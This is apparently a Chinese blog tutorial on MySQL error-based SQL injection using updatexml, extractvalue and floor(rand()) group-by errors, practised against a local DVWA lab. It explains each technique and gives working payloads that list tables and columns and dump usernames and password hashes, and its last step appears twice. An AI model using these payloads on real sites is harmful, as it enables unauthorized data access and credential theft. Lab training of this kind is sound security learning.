SQL注入实战之报错注入篇（updatexmlextractvaluefloor）

SQL注入实战之报错注入篇&＃xff08;updatexml extractvalue floor&＃xff09;

知识铺垫

在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询&＃xff0c;这篇文章带来的是SQL注入之报错注入篇。

首先我们来细分一下SQL注入分类

SQL注入分类&＃xff1a;

• 回显正常—> 联合查询 union select

• 回显报错—> Duplicate entry()
  extractvalue()
  　　 updatexml()

• 盲注 —>布尔型盲注
  基于时间的盲注sleep()

在探讨SQL注入之报错注入之前&＃xff0c;有一个前提就是页面能够响应详细的错误描述&＃xff0c;然而mysql数据库中显示错误描述是因为开发程序中采用了print_r mysql_error()函数&＃xff0c;将mysql错误信息输出。

还有就是一起默写一下SQL注入的核心语句吧&＃xff0c;巩固记忆的同时&＃xff0c;方便后续注入的使用~

information_schema

schemata(schema_name)

tables(table_schema,table_name)

columns(table_schema,table_name,column_name)

select schema_name from information_schema.schemata;

select table_name from information_schema.tables where table_schema&＃61;‘dvwa’;

select column_name from information_schema.columns where table_name&＃61;‘users’ and table_schema&＃61;‘dvwa’;

select concat(username,password) from dvwa.users;

xpath报错注入&＃xff08;extractvalue和updatexml&＃xff09;

一、知识铺垫&＃xff08;请认真研读&＃xff09;

• 在mysql高版本&＃xff08;大于5.1版本&＃xff09;中添加了对XML文档进行查询和修改的函数&＃xff1a;

  updatexml&＃xff08;&＃xff09;

  extractvalue&＃xff08;&＃xff09;

  当这两个函数在执行时&＃xff0c;如果出现xml文档路径错误就会产生报错

• updatexml&＃xff08;&＃xff09;函数

  • updatexml&＃xff08;&＃xff09;是一个使用不同的xml标记匹配和替换xml块的函数。

  • 作用&＃xff1a;改变文档中符合条件的节点的值

  • 语法&＃xff1a; updatexml&＃xff08;XML_document&＃xff0c;XPath_string&＃xff0c;new_value&＃xff09; 第一个参数&＃xff1a;是string格式&＃xff0c;为XML文档对象的名称&＃xff0c;文中为Doc 第二个参数&＃xff1a;代表路径&＃xff0c;Xpath格式的字符串例如//title【&＃64;lang】 第三个参数&＃xff1a;string格式&＃xff0c;替换查找到的符合条件的数据

  • updatexml使用时&＃xff0c;当xpath_string格式出现错误&＃xff0c;mysql则会爆出xpath语法错误&＃xff08;xpath syntax&＃xff09;

  • 例如&＃xff1a; select * from test where ide &＃61; 1 and (updatexml(1,0x7e,3)); 由于0x7e是~&＃xff0c;不属于xpath语法格式&＃xff0c;因此报出xpath语法错误。

• **extractvalue&＃xff08;&＃xff09;函数
  **

  • 此函数从目标XML中返回包含所查询值的字符串 语法&＃xff1a;extractvalue&＃xff08;XML_document&＃xff0c;xpath_string&＃xff09; 第一个参数&＃xff1a;string格式&＃xff0c;为XML文档对象的名称 第二个参数&＃xff1a;xpath_string&＃xff08;xpath格式的字符串&＃xff09; select * from test where id&＃61;1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
  • extractvalue使用时当xpath_string格式出现错误&＃xff0c;mysql则会爆出xpath语法错误&＃xff08;xpath syntax&＃xff09;
  • select user,password from users where user_id&＃61;1 and (extractvalue(1,0x7e));
  • 由于0x7e就是~不属于xpath语法格式&＃xff0c;因此报出xpath语法错误。

二、updatexml&＃xff08;&＃xff09;报错注入实战&＃xff08;基于dvwa平台&＃xff09;

前景提示&＃xff1a;本人在虚拟机中搭建好了dvwa平台&＃xff0c;在本机中完成SQL注入实战,加载dvwa直接进入SQL注入模块&＃xff0c;我这里的等级为low。

我将自己构造的payload语句进行加粗显示&＃xff0c;剩下的都是固定格式。

**
开始注入**

**爆出数据库及相关信息
**1’ and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,&＃64;&＃64;datadir),1)#

爆当前数据库表信息

1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema&＃61;database()),0x7e),1) #

注&＃xff1a;此处使用group_concat&＃xff08;&＃xff09;函数进行输出&＃xff0c;否则会出现错误。如下图所示。

爆user表字段信息

1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema&＃61;‘dvwa’ and table_name&＃61;‘users’),0x7e),1) #

爆数据库内容

1’ and updatexml(1,concat(0x7e,(select group_concat(first_name,0x7e,last_name) from dvwa.users)),1) #

三、extractvalue&＃xff08;&＃xff09;报错注入实战&＃xff08;基于dvwa平台&＃xff09;
extractvalue()函数其实与updatexml()函数大同小异&＃xff0c;都是通过xpath路径错误报错&＃xff0c;而本人的示例中皆为利用0x7e&＃xff08;~&＃xff09;,其不属于xpath语法格式&＃xff0c;因此报出xpath语法错误。

1’ and extractvalue(1,concat(0x7e,user(),0x7e,database())) #

1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema&＃61;database()))) #

1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema&＃61;database() and table_name&＃61;‘users’))) #

1’ and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #

floor&＃xff08;&＃xff09;函数报错注入

一、概述

原理&＃xff1a;利用select count(*),floor(rand(0)*2)x from information_schema.character_sets group by x;导致数据库报错&＃xff0c;通过concat函数连接注入语句与floor(rand(0)*2)函数&＃xff0c;实现将注入结果与报错信息回显的注入方式。

二、函数理解

附带一下本次解释函数的表创建步骤&＃xff08;不再附图&＃xff09;以及数据的填充。

create database test1;
use test1&＃xff1b;

create table czs(id int unsigned not null primary key auto_increment, name varchar(15) not null);

insert into czs(id,name) values(1,‘chenzishuo’);
insert into czs(id,name) values(2,‘zhangsan’);
insert into czs(id,name) values(3,‘lisi’);
insert into czs(id,name) values(4,‘wangwu’);

• rand()函数

  rand()可以产生一个在0和1之间的随机数

  

  可以看出&＃xff0c;直接使用rand函数每次产生的数值不一样&＃xff0c;但当我们提供了一个固定的随机数的种子0之后&＃xff0c;每次产生的值都是相同的&＃xff0c;这也可以称之为伪随机。

  

• floor (rand(0)*2)函数

  floor函数的作用就是返回小于等于括号内该值的最大整数。

  rand()本身是返回0_{1的随机数&＃xff0c;但在后面*2就变成了返回0}2之间的随机数。

  配合上floor函数就可以产生确定的两个数&＃xff0c;即0和1。

  并且结合固定的随机数种子0&＃xff0c;它每次产生的随机数列都是相同的值。

  此处的myclass 表为含有四行数据的表。

  结合上述的函数&＃xff0c;每次产生的随机数列都是 0 1 1 0

group by 函数
group by 函数&＃xff0c;作用就是分类汇总。
等一下再说group by&＃xff0c;我们首先看一下我的表。

再在id 和 name后分别放入a x&＃xff0c;意思就是id显示为a name显示为x。

然后使用group by 函数进行分组&＃xff0c;并且按照x&＃xff08;name&＃xff09;进行排序。

友情提示&＃xff1a;在使用group by 函数进行分类时&＃xff0c;会因为mysql版本问题而产生问题&＃xff0c;主要是启用了ONLY_FULL_GROUP_BY SQL模式&＃xff08;默认情况下&＃xff09;&＃xff0c;MySQL将拒绝选择列表&＃xff0c;HAVING条件或ORDER BY列表的查询引用在GROUP BY子句中既未命名的非集合列&＃xff0c;也不在功能上依赖于它们。&＃xff08;或者自行百度解决&＃xff09;
https://blog.csdn.net/weixin_41991232/article/details/82803170

• count&＃xff08;*&＃xff09;函数

  count&＃xff08;*&＃xff09;函数作用为统计结果的记录数。

  这就是对重复的数据进行整合计数&＃xff0c;x就是每个name的数量&＃xff0c;我这里每个只有一个当然count&＃xff08;*&＃xff09;都为1了。

• *综合使用产生报错
  select count(*),floor(rand(0)*2) x from czs group by x;
  当count&＃xff08;*&＃xff09;和group by x同时执行时&＃xff0c;就会爆出duplicate entry错误。
  *

  

  根据前面的函数&＃xff0c;这句话是统计后面的floor&＃xff08;rand&＃xff08;0&＃xff09;*2&＃xff09;from czs产生的随机数种类并计算数量&＃xff0c;0110&＃xff0c;应该是两个两个&＃xff0c;但是最后却报错了。

  **报错原因解析
  **

  通过 floor 报错的方法来爆数据的本质是 group by 语句的报错。group by 语句报错的原因

  是 floor(random(0)*2)的不确定性&＃xff0c;即可能为 0 也可能为 1

  group by key 执行时循环读取数据的每一行&＃xff0c;将结果保存于临时表中。读取每一行的 key 时&＃xff0c;

  如果 key 存在于临时表中&＃xff0c;则更新临时表中的数据&＃xff08;更新数据时&＃xff0c;不再计算 rand 值&＃xff09;&＃xff1b;如果

  该 key 不存在于临时表中&＃xff0c;则在临时表中插入 key 所在行的数据。&＃xff08;插入数据时&＃xff0c;会再计算

  rand 值&＃xff09;

  如果此时临时表只有 key 为 1 的行不存在 key 为 0 的行&＃xff0c;那么数据库要将该条记录插入临

  时表&＃xff0c;由于是随机数&＃xff0c;插时又要计算一下随机值&＃xff0c;此时 floor(random(0)*2)结果可能为 1&＃xff0c;就

  会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值

  实际测试中发现&＃xff0c;出现报错&＃xff0c;至少要求数据记录为 3 行&＃xff0c;记录数超过 3 行一定会报错&＃xff0c;2 行

  时是不报错的。

三、实战注入&＃xff08;基于dvwa平台&＃xff09;

①判断是否存在报错注入
id&＃61;1’ union select count(*),floor(rand(0)*2) x from information_schema.schemata group by x#

可以看出存在报错注入
②爆出当前数据库名

id&＃61;1’ union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #
dvwa前的1 是哪个随机数&＃xff0c;不要大惊小怪哦~

③爆出表

id&＃61;1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema&＃61;‘dvwa’ limit 0,1)) x from information_schema.schemata group by x#

id&＃61;1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema&＃61;‘dvwa’ limit 1,1)) x from information_schema.schemata group by x#

④爆出字段名

id&＃61;1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name&＃61;‘users’ and table_schema&＃61;‘dvwa’ limit 0,1)) x from information_schema.schemata group by x#

改变limit限定数值&＃xff0c;可以得出当前的字段 user_id first_name user password

⑤爆出user和password

id&＃61;1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#

再解码可得 admin-password

304035)]

改变limit限定数值&＃xff0c;可以得出当前的字段 user_id first_name user password

⑤爆出user和password

id&＃61;1’ union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#
[外链图片转存中…(img-OulhKf9F-1646315304035)]

再解码可得 admin-password
[外链图片转存中…(img-l88Ioa1w-1646315304035)]

大功告成&＃xff01;~~&＃xff01;